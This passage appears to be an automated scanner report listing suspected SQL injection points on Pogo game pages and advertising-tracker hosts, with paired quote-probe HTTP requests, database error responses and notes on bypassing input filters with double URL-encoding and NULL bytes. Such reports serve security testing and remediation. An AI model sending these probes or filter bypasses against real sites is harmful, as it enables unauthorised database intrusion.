GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com%2527%2527&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 2 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:33 GMT
Server: Apache-Coyote/1.1
Content-Length: 37843


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...

1.6. http://game3.pogo.com/room/game/game.jsp [apid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://game3.pogo.com
Path:   /room/game/game.jsp

Issue detail

The apid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the apid request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules%2527&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:30 GMT
Server: Apache-Coyote/1.1
Content-Length: 37803


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://game3.pogo.com/error/invalidurl.html";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authenti
...[SNIP]...

Request 2

GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules%2527%2527&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 2 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:30 GMT
Server: Apache-Coyote/1.1
Content-Length: 37849


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...

1.7. http://game3.pogo.com/room/game/game.jsp [rkey parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://game3.pogo.com
Path:   /room/game/game.jsp

Issue detail

The rkey parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rkey parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357'&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:28 GMT
Server: Apache-Coyote/1.1
Content-Length: 37785


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://game3.pogo.com/error/invalidurl.jsp";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8="Non Authentic
...[SNIP]...

Request 2

GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357''&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 2 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:28 GMT
Server: Apache-Coyote/1.1
Content-Length: 37813


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...

1.8. http://game3.pogo.com/room/game/game.jsp [s_sess cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://game3.pogo.com
Path:   /room/game/game.jsp

Issue detail

The s_sess cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sess cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%00'; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 1 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:42 GMT
Server: Apache-Coyote/1.1
Content-Length: 37770


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
s.linkTrackVars=s.linkTrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://game3.pogo.com/error%2527/java-problem.jsp";
s.eVar2="pogo";
s.pageName="Pogo Unauth generic Log In Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:::Pogo Unauth generic Log In Page:Non Authenticated";
s.prop8
...[SNIP]...

Request 2

GET /room/game/game.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&install=true&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B%00''; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response 2 (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: no-cache, no-store
Content-Language: en-US
Pragma: no-cache
Set-Cookie: com.pogo.info=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/login
Set-Cookie: com.pogo.lkey=; Domain=.pogo.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:15:42 GMT
Server: Apache-Coyote/1.1
Content-Length: 38106


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...

1.9. http://link.mavnt.com/1x1.php [51270 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.mavnt.com
Path:   /1x1.php

Issue detail

The 51270 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 51270 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /1x1.php?51270' HTTP/1.1
Host: link.mavnt.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/confirmation.do
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:45 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 682
Content-Type: text/html

<br />
<b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204
Stack trace:
#0
...[SNIP]...

Request 2

GET /1x1.php?51270'' HTTP/1.1
Host: link.mavnt.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/confirmation.do
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

1.10. http://link.mavnt.com/1x1.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.mavnt.com
Path:   /1x1.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /1x1.php?1'=1 HTTP/1.1
Host: link.mavnt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 675
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204
Stack trace:
#0 /var/d
...[SNIP]...

Request 2

GET /1x1.php?1''=1 HTTP/1.1
Host: link.mavnt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

1.11. http://link.mavnt.com/1x1_map.php [51270 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.mavnt.com
Path:   /1x1_map.php

Issue detail

The 51270 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the 51270 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /1x1_map.php?51270' HTTP/1.1
Host: link.mavnt.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/confirmation.do
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 682
Content-Type: text/html

<br />
<b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''51270''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204
Stack trace:
#0
...[SNIP]...

Request 2

GET /1x1_map.php?51270'' HTTP/1.1
Host: link.mavnt.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/confirmation.do
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:39 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

1.12. http://link.mavnt.com/1x1_map.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://link.mavnt.com
Path:   /1x1_map.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /1x1_map.php?1'=1 HTTP/1.1
Host: link.mavnt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 675
Connection: close
Content-Type: text/html

<br />
<b>Fatal error</b>: Uncaught exception 'DBException' with message 'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1' in /var/data/adventv2/htdocs/tracking/AdventDBMySQL.class.php:204
Stack trace:
#0 /var/d
...[SNIP]...

Request 2

GET /1x1_map.php?1''=1 HTTP/1.1
Host: link.mavnt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:22:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.9
Content-Length: 49
Connection: close
Content-Type: image/gif

GIF89a...................!.......,...........T..;

1.13. http://optimized-by.rubiconproject.com/a/4252/4762/6670-15.js [ses15 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4252/4762/6670-15.js

Issue detail

The ses15 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ses15 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /a/4252/4762/6670-15.js?cb= HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ses15=4762^2'; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rpb=4210%3D1%264214%3D1; csi2=3156581.js^2^1294536526^1294536590&3146355.js^1^1294536507^1294536507; rdk=4252/4762; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3188204.js^1^1294536315^1294536315; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=4762^3; cd=false;

Response 1

HTTP/1.0 504 Gateway Time-out
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>504 Gateway Time-out</h1>
The server didn't respond in time.
</body></html>

Request 2

GET /a/4252/4762/6670-15.js?cb= HTTP/1.1
Host: optimized-by.rubiconproject.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ses15=4762^2''; au=GIP9HWY4-MADS-10.208.38.239; put_1197=3271971346728586924; rdk15=0; ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rpb=4210%3D1%264214%3D1; csi2=3156581.js^2^1294536526^1294536590&3146355.js^1^1294536507^1294536507; rdk=4252/4762; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; csi15=3188204.js^1^1294536315^1294536315; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk2=0; ses2=4762^3; cd=false;

Response 2

HTTP/1.1 200 OK
Date: Sun, 09 Jan 2011 02:25:40 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=4252/4762; expires=Sun, 09-Jan-2011 03:25:40 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Sun, 09-Jan-2011 03:25:40 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=4762^3; expires=Mon, 10-Jan-2011 05:59:59 GMT; max-age=106459; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188204.js^2^1294536315^1294539940; expires=Sun, 16-Jan-2011 02:25:40 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2391

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3188204"
...[SNIP]...

1.14. http://optimized-by.rubiconproject.com/a/4252/4762/6942-2.js [rsid cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://optimized-by.rubiconproject.com
Path:   /a/4252/4762/6942-2.js

Issue detail

The rsid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the rsid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /a/4252/4762/6942-2.js?cb=0.35984857589937747 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/oberon/navheader.jsp?site=pogo&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x&top=http%3A//download-games.pogo.com/AllGames.aspx%3Frefid%3Dheadernav_fp_shopmenu&pageSection=header_downloads_store
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ruid=154d290e46adc1d6f373dd09^1^1294536262^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3UdIwsGOQ/PP8TzZUxGDmBad2r6N25AKxdPo9e'; put_1523=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ; au=GIP9HWY4-MADS-10.208.38.239; ses15=4762^2; csi15=3188204.js^1^1294536315^1294536315; rpb=4210%3D1%264214%3D1; put_1197=3271971346728586924; cd=false; rdk=4252/4762; ses2=4762^1; csi2=3146355.js^1^1294536507^1294536507

Response 1

HTTP/1.0 504 Gateway Time-out
Cache-Control: no-cache
Connection: close
Content-Type: text/html

<html><body><h1>504 Gateway Time-out</h1>
The server didn't respond in time.
</body></html>

Request 2

GET /a/4252/4762/6942-2.js?cb=0.35984857589937747 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/oberon/navheader.jsp?site=pogo&ifw=756&pageSection=header_downloads_store&ifh=210&lkey=x&top=http%3A//download-games.pogo.com/AllGames.aspx%3Frefid%3Dheadernav_fp_shopmenu&pageSection=header_downloads_store
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
